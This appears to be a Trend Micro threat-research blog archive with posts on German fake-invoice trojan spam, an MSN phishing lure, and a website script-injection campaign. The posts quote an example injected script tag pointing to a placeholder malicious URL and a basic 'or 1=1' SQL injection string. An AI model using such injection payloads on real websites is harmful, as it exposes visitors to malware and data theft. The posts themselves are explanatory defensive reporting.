Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
  • Email Subscription

  • About Us

    Author Archive - Alice Decker (Senior Threat Researcher)

    Some people from outside Germany, where I’m from, would say that the Germans like correctness in business, love traditions and fear online transactions (or at least things that can’t be controlled). Well, what can I say… maybe they’re right, as some facts can speak for the above …

    It has become an unwanted tradition for the German computing public to be receiving, for the last two years, threatening spam containing the file RECHNUNG.EXE. These “billings” typically referred to certain online orders of web cams, online shopping, furniture shopping, court invoices, payment of GEZ taxes, software licenses and more. The first time we’ve seen these kinds of emails was in April 2006, wherein the spam appeared to be an online invoice service setup by the German Telekom.

    Taking a closer look at the text in the body we might assume that the social engineering used for this kind of attack is based on the fear that comes with online payment (generally based on the fear of errors related to uncontrollable and unexpected payments). The detection during the years 2006 and 2007 was as TROJ_YABE and TROJ_BZUB (ipv6monl.dll). In the second half of year 2007, the waves of the TROJ_YABE threat seemed to flatten or even stop. But after more than two years, it seems that the YABE Trojan is making a comeback.

    In the last four weeks German users have been receiving “payment reminders” in their email inboxes. The evidence for the payment was either as attached file or as an accessible URL (named as “Rechnung.exe” or “Rechnung.pdf.exe” or variations of it). The spam run is still ongoing as of this writing. The payment notification was sent by a random sender address and it claimed to come from PayPal (Europe). This time the “invoice” was an archive file: Rechnung.rar (which contained the file Rechnung.exe). A sample email is shown below.

    Upon execution the Trojan file (TROJ_BUZUB.IB) connects to a remote system and downloads a file (bot.exe or back.exe or variations of these names having the size of 49,152 bytes and are detected as TROJ_BUZUS.BG). Additionally, it rolls out a new version of WSNPOEM malware – NTOS.EXE, which is detected as TROJ_WSNPOEM.AA. The said Trojan exhibits rootkit abilities by being able to hide itself by hooking the WH_MSGFILTER event. It works with the data files stored in %System32%wnspoem: audio.dll and video.dll.

    It also attempts to inject malicious code into svchost.exe and winlogon.exe services registering the targeted system remotely using the computer name and a certain ID. The malicious dll name used for the injection (at least in its version from 1st of June) is cryptonet.dll (28,672 bytes in size, and detected as a TROJ_BUZUB variant). A request to WHOIS database reveals that the IP of the download server belongs to a private person, which is currently being checked as of this writing.

    Posted in Malware, Spam | Comments Off on New Old Bills: The Rechnung Revivals

    Some days ago our researchers from TrendLabs discovered an attack on Web sites from the European region. Since the number of compromised sites was low, and because they were immediately cleaned, we figured it might be just a proof of concept.

    F-Secure researchers also announced a similar attack where more than 500,000 sites were affected.

    The infection code was a <script > tag that pointed to a malicious URL. The new discovery here is that these malicious tags were inserted between the usual text tags <title > </title >. For example
    <title >My Website <script src= > </script > </title >
    and into <meta >, <a href= > <div class=”myclass” > etc. like for example <a href=http://goodURL <script src=http://maliciousURL > </script > >.

    An infected Web site would display its infection in the browser window title:

    While neither <title > nor <meta > tags are supposed to support <script >, some browsers are prone to syntax errors. They interpret any script tags wherever they are placed.
    The visitors of the affected Web sites are thus exposed to threats active on their systems.

    The massive infection of Web sites was done supposedly through automated SQL injection. This is not the first instance of this type of attack; unfortunately, it would not be the last time either.

    What’s notable about SQL injections is that such attacks can be triggered any time, regardless of the security patch of the SQL server behind. The success of the attack depends on the Web application that uses SQL servers. A Web site with no field content control is pretty easy to fool into sending to the server a simple SQL command. To simplify:

    “SELECT * FROM bank_data WHERE Userid=blah or 1=1”

    The moral of this story is that cyber criminals will have an easy game as long as Web sites are made by construction kit users or from inexperienced developers that may not consider field content checking.

    Trend Micro users are already protected, first through a generic detection of the script — as HTML_IFRAME.YC — and certainly through Web Threat Protection.

    Posted in Malware | Comments Off on Oops, they did it again…

    Do you know the story where a human and a monkey lived in two rooms separated by a single door?

    The first part of the story says that after a while in that room, the human started to get curious and decided to find out what was happening behind the door. As the human peeked through the keyhole, what he saw was another eye, which apparently was the monkey’s.

    Cyber criminals can use the simplest of methods and maximum yield by simply exploiting human curiosity. How?

    The first step is to send a spam email message. This message is supposedly sent through well-known botnet infrastructure.

    The message above was sent in German but it could be sent in any language. The message above reads “With our completely free service, you can find out whoever blocked you in MSN or deleted” in English.

    The link opens a Web site that includes the invitation to use the free service to check the validity of the MSN account.

    All the user has to do here is “to peek through the keyhole” by typing the MSN account and the right password to figure out if his account is “indeed blacklisted”. Of course no answer comes back but…What happens then?

    If the data entered in these fields are valid then the user could be considered an accomplice for the next criminal actions done by the users of the mailbox, the mailbox where the data is sent.

    This gives cyber criminals a free choice to use their unlawfully acquired data in any of their illicit activities. The hacked MSN account can be used to send out spam, distribute malware both through email and the instant messaging application, MSN Messenger. Apart from this, the unauthorized user will then have access to the mailbox and can gather personal data about the affected user.

    Posted in Malware, Spam | Comments Off on Curiosity is the Nourishment of Social Engineering

    In the last weeks German email receivers were forced to train anti social engineering skills.

    In the first days of 2007 the German speaking area was flooded with emails that aim to be bills from 1&1 provider. Later on the requests for payment were sent in connection with social engineering related to other typical German payments like GEZ (government TV tax) or simply online orders.

    Anybody that cares about email security may think that the receivers are slowly getting used to such emails (payment request with the invoice attached as Rechnung.pdf.exe or simply Rechnung.exe). But it seems that the Trojan spammers are still persevering and exercising their social engineering to trick the users to run a program with spying capabilities and therefore reveal sensitive information like their bank account data to criminals. The first step into the systems is realised using social engineering techniques.

    German Ebay marketplace customers may be slightly confused today (Monday 29th). This new email is not related to the payment request. It says that the direct debit couldnt be done. The main message is that the usual balance failed and it asks the user to double check the account data. The information how to do this is correct and relates to real Ebay web site.

    The email body is not dangerous at all. It includes some valid Ebay URLs and hints to the attached list of the transactions for those the user have to pay an amount of 426.96 Euro, which in fact is the malicious code.

    The second new part of this email is the behaviour of the attached file (E260883905016 Rechnung.pdf.exe), when it shows a real document.

    On execution the file drops another executable file in %UserTemp%. This file attempts to connect to the Internet and downloads other components. It’s not new that files are dropped and run in the background and therefore the user doesn’t notice the dropped files (vapo3.exe, win.exe, ipv6monl.dll and others).

    To hide the malicious activity in the background, the program shows a faked PDF file (which must look confusing even to accounting professionals) with accounting data.

    This time the user gets opened a PDF file with a list of transactions.

    Trend Micro will soon detect the file as TROJ_YABE.AY. We will continuously update our Virus Encyclopaedia whenever we find new details.

    Update (Jessie Paz, Tue, 30 Jan 2007 01:51:21 AM)

    Updates courtesy of Alice.

    After deeper analysis, TrendLabs decided to change the malware name to TROJ_YABE.BB. The detection is included in CPR (controlled pattern release) 4.224.03 and above.

    NOTE: Today, the 29th, we faced with four waves of TROJ_YABE. The attached files and their detections are:

    • TROJ_YABE.BB in file “E260883905016-Rechnung.pdf.exe”
    • TROJ_YABE.BA in file “rechnung.exe”
    • TROJ_YABE.AX in file “RG_129427621.pdf.exe”
    • TROJ_YABE.BF in file “rechnung.exe”


    Posted in Bad Sites | Comments Off on Yet Another “Bill” from Ebay


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice